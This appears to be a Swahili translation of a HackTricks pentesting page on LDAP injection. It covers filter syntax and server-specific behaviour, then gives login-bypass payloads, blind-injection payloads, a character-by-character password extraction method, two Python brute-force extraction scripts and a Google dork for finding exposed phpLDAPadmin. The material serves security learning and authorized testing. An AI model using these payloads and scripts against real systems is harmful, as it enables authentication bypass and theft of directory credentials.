Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

LDAP Injection

Kuingiza LDAP

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa una nia ya kazi ya udukuzi na kudukua yasiyodukuzika - tunakupa kazi! (inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha).

LogoCareers | stmcyber.com | penetration testingstmcyber.com

Kuingiza LDAP

LDAP

Ikiwa unataka kujua ni nini LDAP tembelea ukurasa ufuatao:

page389, 636, 3268, 3269 - Pentesting LDAP

Kuingiza LDAP ni shambulio linalolenga programu za wavuti ambazo hujenga taarifa za LDAP kutoka kwa mwingiliano wa mtumiaji. Hutokea wakati programu haifanyi usafi ipasavyo wa mwingiliano, kuruhusu wadukuzi kudhibiti taarifa za LDAP kupitia proksi ya ndani, ikisababisha ufikiaji usioruhusiwa au upangilio wa data.

Kichujio = ( filtercomp ) Filtercomp = na / au / si / kitu Na = & filterlist Au = |filterlist Si = ! filter Filterlist = 1*filter Kitu= rahisi / kujitokeza / kipande Rahisi = sifa filtertype kauli Filtertype = '=' / '~=' / '>=' / '<=' Kujitokeza = sifa = * Kipande = sifa ”=” [mwanzo] * [mwisho] Mwanzo = kauli Mwisho = kauli (&) = Halisi KWELI (|) = Halisi UONGO

Kwa mfano: (&(!(objectClass=Impresoras))(uid=s*)) (&(objectClass=user)(uid=*))

Unaweza kupata ufikiaji kwenye database, na hii inaweza kuwa na taarifa za aina nyingi tofauti.

OpenLDAP: Ikiwa filta 2 zinawasili, inatekeleza tu ya kwanza. ADAM au Microsoft LDS: Pamoja na filta 2 hutoa kosa. SunOne Directory Server 5.0: Inatekeleza filta zote mbili.

Ni muhimu sana kutuma filta na muundo sahihi au kosa litatupwa. Ni bora kutuma filta moja tu.

Filta lazima ianze na: & au | Mfano: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*)) VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Kisha: (&(objectClass=*)(ObjectClass=*)) itakuwa filta ya kwanza (ile inayotekelezwa).

Kupuuza Kuingia

LDAP inasaidia miundo kadhaa ya kuhifadhi nywila: wazi, md5, smd5, sh1, sha, crypt. Kwa hivyo, inaweza kuwa kwamba bila kujali unachoweka ndani ya nywila, inahashishwa.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Orodha

Kuingiza kipofu cha LDAP

Unaweza kulazimisha majibu ya Uongo au Kweli kuchunguza ikiwa data yoyote imerudishwa na kuthibitisha uwezekano wa Kuingiza kipofu cha LDAP:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Poteza data

Unaweza kurudia herufi za ascii, tarakimu na alama:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Scripts

Gundua uga halali za LDAP

Vitu vya LDAP vina sifa kadhaa kwa chaguo-msingi ambazo zinaweza kutumika kuokoa habari. Unaweza kujaribu kufanya nguvu zote kwenye hizo ili kutoa habari hiyo. Unaweza kupata orodha ya sifa za LDAP za chaguo-msingi hapa.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Mchanganyiko Maalum wa Kuingiza LDAP kwa Kipofu (bila "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

intitle:"phpLDAPadmin" inurl:cmd.php

Payloads Zaidi

Ikiwa una nia katika kazi ya udukuzi na kudukua yasiyodukuzika - tunakupa kazi! (ujuzi wa kuzungumza na kuandika Kipolishi vizuri unahitajika).

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousJWT Vulnerabilities (Json Web Tokens)NextLogin Bypass

Last updated